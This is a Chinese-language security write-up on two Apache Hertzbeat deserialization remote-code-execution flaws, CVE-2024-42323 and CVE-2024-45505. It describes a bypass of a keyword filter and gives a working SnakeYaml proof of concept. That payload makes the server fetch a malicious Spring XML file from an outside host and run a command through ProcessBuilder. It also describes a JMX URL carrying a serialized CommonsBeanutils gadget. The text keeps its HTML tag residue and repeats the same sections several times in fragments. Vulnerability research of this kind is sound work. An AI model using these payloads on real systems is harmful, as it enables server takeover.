Apache Hertzbeat 反序列化漏洞分析 (CVE-2024-42323 & CVE-2024-45505)<\/h1>

漏洞概述<\/h2>

本文档详细分析Apache Hertzbeat中发现的两种反序列化远程代码执行漏洞：<\/p>

CVE-2024-42323<\/strong>: SnakeYaml反序列化RCE绕过漏洞<\/li>

CVE-2024-45505<\/strong>: 原生反序列化RCE漏洞<\/li> <\/ol>
这两个漏洞都是在Hertzbeat项目被贡献到Apache基金会孵化前发现的。<\/p>
漏洞一：SnakeYaml反序列化RCE绕过 (CVE-2024-42323)<\/h2>
漏洞背景<\/h3>
Hertzbeat使用SnakeYaml库进行YAML解析，存在反序列化漏洞。虽然新版本对传入数据进行了过滤，但过滤机制存在缺陷。<\/p>
过滤机制分析<\/h3>
系统对传入数据进行了以下关键字过滤：<\/p>

ScriptEngineManager<\/code><\/li>
URLClassLoader<\/code><\/li> <\/ul> 这种过滤方式非常容易被绕过，因为攻击者可以使用其他利用链。<\/p> 利用限制<\/h3> 在目标环境中存在以下限制：<\/p> JDK版本为11<\/li> Java环境为JRE<\/li> 与LDAP相关的利用链难以使用<\/li> <\/ul> 绕过方法<\/h3> 使用org.springframework.context.support.ClassPathXmlApplicationContext<\/code>类加载恶意XML文件实现RCE。<\/p> PoC<\/h3> { <\/span><\/span> "define": <\/span>"category: !!org.springframework.context.support.ClassPathXmlApplicationContext [\"http:\/\/192.168.5.164:8000\/hack.xml\"]"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>恶意XML示例<\/h3> <beans<\/span> xmlns=<\/span>"http:\/\/www.springframework.org\/schema\/beans"<\/span> <\/span><\/span> xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span> <\/span><\/span> xsi:schemaLocation=<\/span>"http:\/\/www.springframework.org\/schema\/beans http:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd"<\/span>><\/span> <\/span><\/span> <bean<\/span> id=<\/span>"pb"<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span> init-method=<\/span>"start"<\/span>><\/span> <\/span><\/span> <constructor-arg><\/span> <\/span><\/span> <list><\/span> <\/span><\/span> <value><\/span>touch<\/value><\/span> <\/span><\/span> <value><\/span>\/tmp\/pwned<\/value><\/span> <\/span><\/span> <\/list><\/span> <\/span><\/span> <\/constructor-arg><\/span> <\/span><\/span> <\/bean><\/span> <\/span><\/span><\/beans><\/span> <\/span><\/span><\/code><\/pre>攻击流程<\/h3> 构造包含恶意YAML的请求<\/li> 服务端解析YAML时触发反序列化<\/li> 加载远程恶意XML文件<\/li> XML中定义的ProcessBuilder执行系统命令<\/li> <\/ol> 漏洞二：原生反序列化RCE (CVE-2024-45505)<\/h2> 漏洞位置<\/h3> 漏洞位于org.dromara.hertzbeat.collector.collect.jmx.JmxCollectImpl#getConnectSession<\/code>方法中，用户可控制url参数值。<\/p> 漏洞分析<\/h3> 用户控制的url参数传递给JMXConnectorFactory#newJMXConnector<\/code><\/li> 返回RMIConnector<\/code>实例<\/li> 调用RMIConnector<\/code>的connect<\/code>方法<\/li> 最终调用findRMIServer<\/code>方法<\/li> 当url符合特定要求时，进入JDK原生反序列化逻辑<\/li> 反序列化url中的base64数据<\/li> <\/ol> 利用条件<\/h3> 项目中存在CommonsBeanutils依赖，可直接使用相关利用链。<\/p> PoC<\/h3> URL中包含base64编码的CommonsBeanutils1 9.2版本的序列化数据，执行命令为touch \/tmp\/cccc<\/code>。<\/p> 漏洞修复建议<\/h2> 对于SnakeYaml反序列化漏洞<\/h3> 禁用危险的YAML特性<\/li> 实现更严格的反序列化类白名单机制<\/li> <\/ol> 对于原生反序列化漏洞<\/h3> 禁止JMX连接URL参数完全可控<\/li> 添加反序列化类白名单验证<\/li> 升级相关依赖库到安全版本<\/li> <\/ol> 总结<\/h2> 这两个漏洞都涉及Java反序列化安全问题，虽然表现形式不同，但都可能导致远程代码执行。建议开发者：<\/p> 避免直接反序列化不可信数据<\/li> 实施严格的反序列化类白名单<\/li> 定期更新依赖库<\/li> 对用户输入进行严格验证和过滤<\/li> <\/ol> 对于安全研究人员，这些案例展示了：<\/p> 过滤机制绕过技巧<\/li> 不同反序列化场景下的利用方法<\/li> 环境限制下的利用链选择<\/li> <\/ol>

Apache Hertzbeat 反序列化漏洞分析 (CVE-2024-42323 & CVE-2024-45505)<\/h1>

漏洞一：SnakeYaml反序列化RCE绕过 (CVE-2024-42323)<\/h2>

漏洞背景<\/h3>
Hertzbeat使用SnakeYaml库进行YAML解析，存在反序列化漏洞。虽然新版本对传入数据进行了过滤，但过滤机制存在缺陷。<\/p>

绕过方法<\/h3>
使用`org.springframework.context.support.ClassPathXmlApplicationContext<\/code>类加载恶意XML文件实现RCE。<\/p>`

漏洞二：原生反序列化RCE (CVE-2024-45505)<\/h2>

漏洞位置<\/h3>
漏洞位于`org.dromara.hertzbeat.collector.collect.jmx.JmxCollectImpl#getConnectSession<\/code>方法中，用户可控制url参数值。<\/p>`

利用条件<\/h3>
项目中存在CommonsBeanutils依赖，可直接使用相关利用链。<\/p>

PoC<\/h3>
URL中包含base64编码的CommonsBeanutils1 9.2版本的序列化数据，执行命令为`touch \/tmp\/cccc<\/code>。<\/p>`

Apache Hertzbeat 反序列化漏洞分析 (CVE-2024-42323 & CVE-2024-45505)<\/h1>

漏洞一：SnakeYaml反序列化RCE绕过 (CVE-2024-42323)<\/h2>

漏洞背景<\/h3> Hertzbeat使用SnakeYaml库进行YAML解析，存在反序列化漏洞。虽然新版本对传入数据进行了过滤，但过滤机制存在缺陷。<\/p>

绕过方法<\/h3> 使用org.springframework.context.support.ClassPathXmlApplicationContext<\/code>类加载恶意XML文件实现RCE。<\/p>

漏洞二：原生反序列化RCE (CVE-2024-45505)<\/h2>

漏洞位置<\/h3> 漏洞位于org.dromara.hertzbeat.collector.collect.jmx.JmxCollectImpl#getConnectSession<\/code>方法中，用户可控制url参数值。<\/p>

利用条件<\/h3> 项目中存在CommonsBeanutils依赖，可直接使用相关利用链。<\/p>

PoC<\/h3> URL中包含base64编码的CommonsBeanutils1 9.2版本的序列化数据，执行命令为touch \/tmp\/cccc<\/code>。<\/p>

漏洞背景<\/h3>
Hertzbeat使用SnakeYaml库进行YAML解析，存在反序列化漏洞。虽然新版本对传入数据进行了过滤，但过滤机制存在缺陷。<\/p>

绕过方法<\/h3>
使用`org.springframework.context.support.ClassPathXmlApplicationContext<\/code>类加载恶意XML文件实现RCE。<\/p>`

漏洞位置<\/h3>
漏洞位于`org.dromara.hertzbeat.collector.collect.jmx.JmxCollectImpl#getConnectSession<\/code>方法中，用户可控制url参数值。<\/p>`

利用条件<\/h3>
项目中存在CommonsBeanutils依赖，可直接使用相关利用链。<\/p>

PoC<\/h3>
URL中包含base64编码的CommonsBeanutils1 9.2版本的序列化数据，执行命令为`touch \/tmp\/cccc<\/code>。<\/p>`